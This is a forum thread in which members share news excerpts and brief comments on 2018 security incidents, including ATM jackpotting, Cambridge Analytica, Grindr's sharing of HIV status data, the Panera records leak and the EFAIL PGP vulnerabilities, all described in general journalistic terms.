The Data Breach Thread

Everything else!

Moderators: Bakhtosh, EvilHomer3k

Post Reply
User avatar
Max Peck
Posts: 13682
Joined: Fri Aug 05, 2005 8:09 pm
Location: Down the Rabbit-Hole

Re: The Data Breach Thread

Post by Max Peck »

Windows Meltdown patches halted for some AMD systems after PCs refuse to boot
AMD processors aren’t affected by the devastating Meltdown CPU flaw, but the emergency fix for Meltdown and Spectre can apparently bring certain AMD CPUs to their knees. Microsoft has stopped offering the Windows security patch to some AMD systems after reports of PCs not booting.

“After investigating, Microsoft has determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown,” Microsoft’s security advisory reads. “To prevent AMD customers from getting into an unbootable state, Microsoft will temporarily pause sending the following Windows operating system updates to devices with impacted AMD processors at this time.”
"What? What? What?" -- The 14th Doctor

It's not enough to be a good player... you also have to play well. -- Siegbert Tarrasch
User avatar
AWS260
Posts: 12664
Joined: Wed Feb 08, 2006 12:51 pm
Location: Brooklyn

Re: The Data Breach Thread

Post by AWS260 »

This is an interesting article about how the Meltdown/Spectre news leaked early.
The biggest hint came on December 18th, when Linus Torvalds merged a late-breaking patch that changed the way the Linux kernel interacts with x86 processors. “This, besides helping fix KASLR leaks (the pending Page Table Isolation (PTI) work), also robustifies the x86 entry code,” Torvalds explained. The most recent kernel release had come just one day earlier. Normally a patch would wait to be bundled into the next release, but for some reason, this one was too important. Why would the famously cranky Torvalds include an out-of-band update so casually, especially one that seemed likely to slow down the kernel?
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

ATM Makers Issue Warning About Cyber Criminals Targeting Cash Machines
Diebold Nixdorf Inc and NCR Corp, two of the world’s largest ATM makers, have warned that cybercriminals are targeting U.S. cash machines with tools that force them to spit out cash in hacking schemes known as “jackpotting.”

The two ATM makers did not identify any victims or say how much money had been lost. Jackpotting has been rising worldwide in recent years, though it is unclear how much cash has been stolen because victims and police often do not disclose details.

The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

Krebs: First ‘Jackpotting’ Attacks Hit U.S. ATMs
ATM “jackpotting” — a sophisticated crime in which thieves install malicious software and/or hardware at ATMs that forces the machines to spit out huge volumes of cash on demand — has long been a threat for banks in Europe and Asia, yet these attacks somehow have eluded U.S. ATM operators. But all that changed this week after the U.S. Secret Service quietly began warning financial institutions that jackpotting attacks have now been spotted targeting cash machines here in the United States.

To carry out a jackpotting attack, thieves first must gain physical access to the cash machine. From there they can use malware or specialized electronics — often a combination of both — to control the operations of the ATM.
...
On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States.

“While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”
...
The source said the Secret Service is warning that thieves appear to be targeting Opteva 500 and 700 series Dielbold ATMs using the Ploutus.D malware in a series of coordinated attacks over the past 10 days, and that there is evidence that further attacks are being planned across the country.
...
“In previous Ploutus.D attacks, the ATM continuously dispensed at a rate of 40 bills every 23 seconds,” the alert continues. Once the dispense cycle starts, the only way to stop it is to press cancel on the keypad. Otherwise, the machine is completely emptied of cash, according to the alert.
It's almost as if people are the problem.
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico.
Krebs wrote:“Discovered for the first time in Mexico back in 2013, Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message, a technique that had never been seen before,” FireEye’s Daniel Regalado wrote.
...
Reached for comment, Diebold shared an alert it sent to customers Friday warning of potential jackpotting attacks in the United States. Diebold’s alert confirms the attacks so far appear to be targeting front-loaded Opteva cash machines.

“As in Mexico last year, the attack mode involves a series of different steps to overcome security mechanism and the authorization process for setting the communication with the [cash] dispenser,” the Diebold security alert reads. A copy of the entire Diebold alert, complete with advice on how to mitigate these attacks, is available here (PDF).
It's almost as if people are the problem.
User avatar
hitbyambulance
Posts: 10233
Joined: Wed Oct 13, 2004 3:51 am
Location: Map Ref 47.6°N 122.35°W
Contact:

Re: The Data Breach Thread

Post by hitbyambulance »

lol

https://flipboard.com/@flipboard/-a-map ... nsider.com

Strava 'heatmaps' revealing secret military bases around the world
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Key iPhone Source Code Gets Posted Online in 'Biggest Leak in History'
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.

The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.

The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Israeli Company Has Likely Found a Way to Break Into Any iPhone
Sometime in the past few months, Cellebrite, an Israeli cyberforensics firm that has big-ticket contracts with the U.S. government, likely found a way to break the security on virtually all iPhone models, Thomas Brewster reports in Forbes. The company has been straight-up advertising to law enforcement agencies that its “advanced unlocking and extraction services” are available for devices running iOS 5 to iOS 11. Furthermore, Brewster cites a source involved in police forensics who says he heard from Cellebrite that it found a way to unlock the iPhone 8. He concluded that Cellebrite must be able to do the same with the iPhone X, since the security features in the two devices are very similar.

In fact, Brewster dug up a warrant from the Department of Homeland Security indicating that its agents were able to break into an iPhone X confiscated in November from a suspect in an arms-trafficking case. The warrant doesn’t detail exactly how it was able to unlock the device, but it notes that the department’s Cellebrite specialist performed a “forensic extraction” in December.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Moliere wrote: Wed Feb 07, 2018 11:13 pm Key iPhone Source Code Gets Posted Online in 'Biggest Leak in History'
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.

The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.

The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.
Biggest leak in *Apple* history...
“This is the biggest leak in history,” Jonathan Levin, the author of a series of books on iOS and Mac OSX internals, told me in an online chat, referring to Apple's history.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

ars technica
A major dust-up on an Internet discussion forum is touching off troubling questions about the security of some browser-trusted HTTPS certificates when it revealed the CEO of a certificate reseller emailed a partner the sensitive private keys for 23,000 TLS certificates.

The email was sent on Tuesday by the CEO of Trustico, a UK-based reseller of TLS certificates issued by the browser-trusted certificate authorities Comodo and, until recently, Symantec. It was sent to Jeremy Rowley, an executive vice president at DigiCert, a certificate authority that acquired Symantec's certificate issuance business after Symantec was caught flouting binding industry rules, prompting Google to distrust Symantec certificates in its Chrome browser. In communications earlier this month, Trustico notified DigiCert that 50,000 Symantec-issued certificates Trustico had resold should be mass revoked because of security concerns.

When Rowley asked for proof the certificates were compromised, the Trustico CEO emailed the private keys of 23,000 certificates, according to an account posted to a Mozilla security policy forum. The report produced a collective gasp among many security practitioners who said it demonstrated a shockingly cavalier treatment of the digital certificates that form one of the most basic foundations of website security.

Generally speaking, private keys for TLS certificates should never be archived by resellers, and, even in the rare cases where such storage is permissible, they should be tightly safeguarded. A CEO being able to attach the keys for 23,000 certificates to an email raises troubling concerns that those types of best practices weren't followed. (There's no indication the email was encrypted, either, although neither Trustico nor DigiCert provided that detail when responding to questions.) Other critics contend Trustico emailed the keys in an attempt to force customers with Symantec-issued certificates to move to Comodo-issued certificates. Although DigiCert took over Symantec's certificate issuance business, it doesn't count Trustico as a reseller.

In a statement, Trustico officials said the keys were recovered from "cold storage," a term that typically refers to offline storage systems.

"Trustico allows customers to generate a Certificate Signing Request and Private Key during the ordering process," the statement read. "These Private Keys are stored in cold storage, for the purpose of revocation."
...
Update: Several hours after this post went live, Trustico's website went offline after a Web security expert posted a critical vulnerability on Twitter. The flaw, in a trustico.com website feature that allowed customers to confirm certificates were properly installed on their sites, appeared to allow attackers to run malicious code on Trustico servers with unfettered "root" privileges.
It's almost as if people are the problem.
User avatar
LawBeefaroni
Forum Moderator
Posts: 55316
Joined: Fri Oct 15, 2004 3:08 pm
Location: Urbs in Horto, outrageous taxes on everything

Re: The Data Breach Thread

Post by LawBeefaroni »

So the former Equifax CIO is up on insider trading charges. He's one of many executives who sold $Millions of shares after the breach was known but before it was public. He's the only one for which the "I didn't know about it when I sold" defense is a technical impossibility. Unlike, you know, the CFO for whom it is merely 99.9% impossible.


The following Monday, he conducted web searches about the impact of Experian Plc’s 2015 data breach on its stock price, the agency found. Hours later, Ying exercised all of his available stock options, resulting in him receiving 6,815 shares of Equifax stock. He then sold the stock for more than $950,000.

The following week, Equifax disclosed the cyberattack. The hack has shaken confidence in the Atlanta-based company, which faces more than 240 class-action lawsuits and more than 60 regulatory or government inquiries.
" Hey OP, listen to my advice alright." -Tha General
"No scientific discovery is named after its original discoverer." -Stigler's Law of Eponymy, discovered by Robert K. Merton

MYT
malchior
Posts: 24794
Joined: Wed Oct 13, 2004 12:58 pm

Re: The Data Breach Thread

Post by malchior »

Not a traditional data breach but the waters swirling around Facebook have darkened significantly since the revelations that user data had been collected and used for political targeting by Cambridge Analytica.
Politicians in the US, Europe and the UK are calling on Facebook to explain how data on millions of its users was harvested.

US senators have called on Mark Zuckerberg to testify before Congress about how it will protect users.

The head of the European Parliament said it would investigate to see if the data was misused.

A spokesman for Prime Minister Theresa May said she was "very concerned" about the revelations.

Over the weekend, the Guardian and the New York Times published stories which alleged that Facebook had not done enough to warn millions of users that data firm Cambridge Analytica had collected information about them.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Orbitz says a possible data breach has affected 880,000 credit cards
Travel booking website Orbitz has announced that it discovered a potential data breach that exposed information for thousands of customers, as reported by Engadget. The incident, discovered by the company on March 1st, may have exposed information tied to about 880,000 credit cards.

The consumer data in question is from an older booking platform, where information may have been accessed between October and December 2017. Orbitz partner platform data, such as travel booked via Amex Travel, submitted between January 1st, 2016 and December 22nd, 2017 may have also been compromised. The Expedia-owned company says that names, payment card information, dates of birth, email addresses, physical billing addresses, gender, and phone numbers may have been accessed, but it doesn’t yet have “direct evidence” that any information was taken from the website.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

More of a feature than a breach, but still, come on FB!

Facebook has been collecting call history and SMS data from Android devices
Facebook has been collecting call records and SMS data from Android devices for years. Several Twitter users have reported finding months or years of call history data in their downloadable Facebook data file. A number of Facebook users have been spooked by the recent Cambridge Analytica privacy scandal, prompting them to download all the data that Facebook stores on their account. The results have been alarming for some.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

Accessing Your Facebook Data
Download Your Info: This includes a lot of the same information available to you in your account and activity log, including your Timeline info, posts you have shared, messages, photos and more. Additionally, it includes information that is not available simply by logging into your account, like the ads you have clicked on, data like the IP addresses that are logged when you log into or out of Facebook, and more. To download your information, go to your Settings and click Download a copy of your Facebook data. Learn more.
It's almost as if people are the problem.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Europol arrests suspect in bank heists that stole $1.2 billion using malware
After a four year investigation, Europol announced it has arrested the suspected leader of a crime syndicate that stole $1.2 billion from over 100 banks in more than 40 countries using malware. According to Europol, the suspect was arrested by the Spanish National Police in Alicante, Spain, with support from the FBI, Romanian, Belarusian, and Taiwanese authorities, along with cybersecurity companies.

Beginning in 2013, the crime syndicate used multiple malware campaigns — the first called Anunak, followed by more complex versions known as Carbanak and Cobalt — to access bank employees’ computers using phishing scams, and then take over bank systems and access the servers that controlled ATMs.

The group used that access to remotely dispense money from ATMs for their associates to grab, inflate account balances, then take the money out at ATMs, and transfer money from the infected banks into accounts they controlled. Europol says the group would then use prepaid cards linked to cryptocurrency wallets to launder the money and buy luxury cars and houses.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Saks Fifth Avenue:
On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores.

Although at this moment it is close to impossible to ascertain the exact window of compromise, the preliminary analysis suggests that criminals were siphoning the information between May 2017 to present. Based on the analysis of the available data, the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised. The majority of stolen credit cards were obtained from New York and New Jersey locations.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Grindr exposed its users’ HIV statuses to two other companies
Grindr users — which include gay, bi, trans, and queer people — can indicate on their profile whether they are HIV positive or negative, when is the last time they got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP. But the app has not been keeping this info private: Grindr has been sharing people’s HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics, BuzzFeed reports. Because the HIV info is shared along with GPS data, phone IDs, and email addresses, it makes it possible to link specific Grindr users with their health condition.

What’s more, the app has been sharing users’ info — like GPS location, sexuality, relationship status, and phone ID — with advertising companies, according to SINTEF. In some cases, this data was not protected by encryption.

Grindr chief technology officer Scott Chen told BuzzFeed that it’s “standard practices” for mobile apps to work with companies like Apptimize and Localytics, and that the data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” He added that Grindr doesn’t sell its user info to third parties. Still, security experts and LGBT advocates told BuzzFeed the app should have been more clear on how it handles the data, especially since it affects an already-vulnerable community that’s often victim of harassment.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Moliere wrote: Mon Apr 02, 2018 6:24 pm Grindr exposed its users’ HIV statuses to two other companies
Grindr users — which include gay, bi, trans, and queer people — can indicate on their profile whether they are HIV positive or negative, when is the last time they got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP. But the app has not been keeping this info private: Grindr has been sharing people’s HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics, BuzzFeed reports. Because the HIV info is shared along with GPS data, phone IDs, and email addresses, it makes it possible to link specific Grindr users with their health condition.

What’s more, the app has been sharing users’ info — like GPS location, sexuality, relationship status, and phone ID — with advertising companies, according to SINTEF. In some cases, this data was not protected by encryption.

Grindr chief technology officer Scott Chen told BuzzFeed that it’s “standard practices” for mobile apps to work with companies like Apptimize and Localytics, and that the data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” He added that Grindr doesn’t sell its user info to third parties. Still, security experts and LGBT advocates told BuzzFeed the app should have been more clear on how it handles the data, especially since it affects an already-vulnerable community that’s often victim of harassment.
A bit more info:
The disclosure of HIV status also raises questions about the app’s privacy policy, which states: “You may also have the option to provide information concerning health characteristics, such as your HIV status or Last Tested Date. Remember that if you choose to include information in your profile, and make your profile public, that information will also become public.”

But the average person may not know or understand what they’ve agreed to in the fine print. Some experts argue that Grindr should be more specific in its user agreements about how it’s using their data.
Data Privacy policies need to be far, far more clear. I expect this allows them to get around HIPPA, but still...
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Panerabread.com
Panerabread.com, the Web site for the American chain of bakery-cafe fast casual restaurants by the same name, leaked millions of customer records — including names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number — for at least eight months before it was yanked offline earlier today,

The data available in plain text from Panera’s site appeared to include records for any customer who has signed up for an account to order food online via panerabread.com.
Looks like only the online orders at least. Not quite a data breach, as it was just published for anyone apparently, but at least a breach of trust.

Oh, and it was indexable and crawlable, at least until it was fixed today:
Fast forward to early this afternoon — exactly eight months to the day after Houlihan first reported the problem — and data shared by Houlihan indicated the site was still leaking customer records in plain text. Worse still, the records could be indexed and crawled by automated tools with very little effort.

For example, some of the customer records include unique identifiers that increment by one for each new record, making it potentially simple for someone to scrape all available customer accounts. The format of the database also lets anyone search for customers via a variety of data points, including by phone number.

“Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you’d like, up to and including the entire database,” Houlihan said.

Shortly after KrebsOnSecurity spoke briefly with Panera’s chief information officer John Meister by phone today, the company briefly took the Web site offline. As of this publication, the site is back online but the data referenced above no longer appears to be reachable.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Facebook says Cambridge Analytica data collection affected nearly twice as many users as previously thought
Facebook today revealed that as many as 87 million users, most of them in the US but at least 1 million in the UK, may have had their information improperly obtained and used by the data mining firm Cambridge Analytica. The revelation indicates that nearly twice as many Facebook users may have been directly affected by the ongoing data privacy scandal resulting from the unauthorized sale of the social network’s user data to the third-party company, which was contracted by the Trump campaign to help with election ad targeting. Initial reports from The New York Times and The Guardian put the figure at as many as 50 million users who had data scraped by Cambridge psychology professor Aleksandr Kogan’s survey app via Facebook Login.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Nearly 64,000 New Zealanders affected by Cambridge Analytica, but only 10 people downloaded the quiz
Although 311,127 Australians were affected by the Cambridge Analytica data breach, only 53 of the country’s citizens took the Facebook quiz responsible for improperly obtaining and using personal information, as reported by The Guardian. Similarly, 63,724 people in New Zealand were affected, but only 10 New Zealanders downloaded the quiz.

It’s reasonable to assume many of the people in Australia and New Zealand were impacted via a friend in their own country, but that’s likely far from accounting for everyone. These numbers also demonstrate the ripple effects from users’ friends abroad who granted permissions to the personality quiz app, called “thisisyourdigitallife.”
This is why I periodically purge my FB friends list.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Max Peck
Posts: 13682
Joined: Fri Aug 05, 2005 8:09 pm
Location: Down the Rabbit-Hole

Re: The Data Breach Thread

Post by Max Peck »

It's (one example of) why I have never had a Facebook account.
"What? What? What?" -- The 14th Doctor

It's not enough to be a good player... you also have to play well. -- Siegbert Tarrasch
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Former Cambridge Analytica employee says Facebook users affected could be ‘much greater than 87 million’
I should emphasise that the Kogan/GSR datasets and questionnaires were not the only Facebook-connected questionnaires and datasets which Cambridge Analytica used. I am aware in a general sense of a wide range of surveys which were done by CA or its partners, usually with a Facebook login – for example, the “sex compass” quiz. I do not know the specifics of these surveys or how the data was acquired or processed. But I believe it is almost certain that the number of Facebook users whose data was compromised through routes similar to that used by Kogan is much greater than 87 million; and that both Cambridge Analytica and other unconnected companies and campaigns were involved in these activities.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
hitbyambulance
Posts: 10233
Joined: Wed Oct 13, 2004 3:51 am
Location: Map Ref 47.6°N 122.35°W
Contact:

Re: The Data Breach Thread

Post by hitbyambulance »

https://www.theguardian.com/technology/ ... rivacy-law
Facebook has moved more than 1.5 billion users out of reach of European privacy law, despite a promise from Mark Zuckerberg to apply the “spirit” of the legislation globally.

In a tweak to its terms and conditions, Facebook is shifting the responsibility for all users outside the US, Canada and the EU from its international HQ in Ireland to its main offices in California. It means that those users will now be on a site governed by US law rather than Irish law.

The move is due to come into effect shortly before General Data Protection Regulation (GDPR) comes into force in Europe on 25 May. Facebook is liable under GDPR for fines of up to 4% of its global turnover – around $1.6bn – if it breaks the new data protection rules.
of course:
Facebook also said the change did not carry tax implications. That means users will exist in a state of legal superposition: for tax purposes, Facebook will continue to book their revenue through Facebook’s Irish office, but for privacy protections, they will deal with the company’s headquarters in California.
at least there are fewer people asking me 'why don't yooou haaave a faaaaacebooook accooooount' these days.
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

SunTrust
SunTrust Banks Inc., Georgia’s largest lender, said it’s investigating a former employee that might have stolen personal data on 1.5 million customers.
...
The company will offer free identity-protection services through Experian Plc for all current and new customers “on an ongoing basis,” according to the statement. The theft didn’t include social security numbers or user IDs and passwords, according to SunTrust, which didn’t identify the employee.
...
The company can absorb the costs associated with identity monitoring into its “normal course of business,” Rogers said during the call.

He said the company’s investigation started six to eight weeks ago, when it discovered the former employee attempted to download client information. Late last week, SunTrust discovered that the information might have been exposed externally, and that’s when it decided to disclose the incident to clients, Rogers said.
It's almost as if people are the problem.
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Lorini
Posts: 8282
Joined: Wed Oct 13, 2004 8:52 am
Location: Santa Clarita, California

Re: The Data Breach Thread

Post by Lorini »

For those of us who have poor memories many of those are just not usable. If I forget the weird pattern to open my phone I'm fucked and I don't want to be fucked. The pattern I use is only obvious if you know me and I don't hang out with people who would try to steal my phone. The other thing is that I can always lock my phone from my computer so really it's not that big of a deal.
Black Lives Matter
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Twitter urges users to change passwords after computer glitch
Twitter Inc urged its more than 330 million users to change their passwords after a glitch caused some of them to be stored in plain text on its internal computer system.
So change it from Password1 to Password2? :ninja:
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

TheMix wrote: Wed Sep 20, 2017 12:28 pm In short, consider putting a freeze on the big 3 as well as the little 2.
Add one more:
But Kerskie’s investigation revealed that the mobile phone merchants weren’t asking any of the four credit bureaus mentioned above. Rather, the mobile providers were making credit queries with the National Consumer Telecommunications and Utilities Exchange (NCTUE), or nctue.com.
...
When I did some more digging on the NCTUE, I discovered…wait for it…Equifax also is the sole contractor that manages the NCTUE database. The entity’s site is also hosted out of Equifax’s servers. Equifax’s current contract to provide this service expires in 2020, according to a press release posted in 2015 by Equifax.
It's almost as if people are the problem.
User avatar
LawBeefaroni
Forum Moderator
Posts: 55316
Joined: Fri Oct 15, 2004 3:08 pm
Location: Urbs in Horto, outrageous taxes on everything

Re: The Data Breach Thread

Post by LawBeefaroni »

There are 150M users of MyFitnessPal?
" Hey OP, listen to my advice alright." -Tha General
"No scientific discovery is named after its original discoverer." -Stigler's Law of Eponymy, discovered by Robert K. Merton

MYT
User avatar
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok
Contact:

Re: The Data Breach Thread

Post by Isgrimnur »

11M active users per month, plus however many slackers that have registered, yet no longer use it.

Image
It's almost as if people are the problem.
User avatar
Max Peck
Posts: 13682
Joined: Fri Aug 05, 2005 8:09 pm
Location: Down the Rabbit-Hole

Re: The Data Breach Thread

Post by Max Peck »

Technically, not a data breach, but...

Attention PGP Users: New Vulnerabilities Require You To Take Action Now
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.
Scoop: PGP and S/Mime have critical vulnerabilities. We @SZ, NDR, WDR have been in touch with the researchers for months. This is how the two (!) attacks work (1/x) #efail

Certain conditions have to be met.
1.) Attacker needs you're ciphertext
2.) HTML has to be enabled. (2/x) #efail

The first attack, called "direct exfiltration":
Attacker creates a multipart email with three body parts. First body part, HTML-tag, opened, second body part, ciphertext added, third body part, html-tag closed. (3/x) #efail

Scarily easily to do, by the way. Disable hmtl. (4/x) #efail

Second attack: They attackers precisely modify plaintext (if those blocks are known). Works both for S/Mime and in PGP. (5/x) #efail

Since S/Mime mails usually start with "Content-type: multipart/signed", attackers have enough knowledge to re-write ciphertext and include html-tag, then exfiltrate. (6/x) #efail

PGP is a little different, since PGP compresses plaintext before encrypting, there guessing known plaintext bytes is harder. (7/x) #efail

All in all, truly troubling, in my humble (!) opinion. Be advised: If you send an e-mail to five persons, using PGP, 6 people can be attacked. The five persons you've sent the mail to, and yourself. (8/8) #efail
PGP: 'Serious' flaw found in secure email tech
Security expert Mikko Hypponen, at F-Secure, said his understanding was that the vulnerability could in theory be used to decrypt a cache of encrypted emails sent in the past, if an attacker had access to such data.
"What? What? What?" -- The 14th Doctor

It's not enough to be a good player... you also have to play well. -- Siegbert Tarrasch
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Chilis Payment Card info:
What Happened? On May 11, 2018, we learned that some of our Guests’ payment card information was compromised at certain Chili’s restaurants as the result of a data incident. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.
User avatar
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Securus (phone tracking for marketing and warrantless law enforcement):
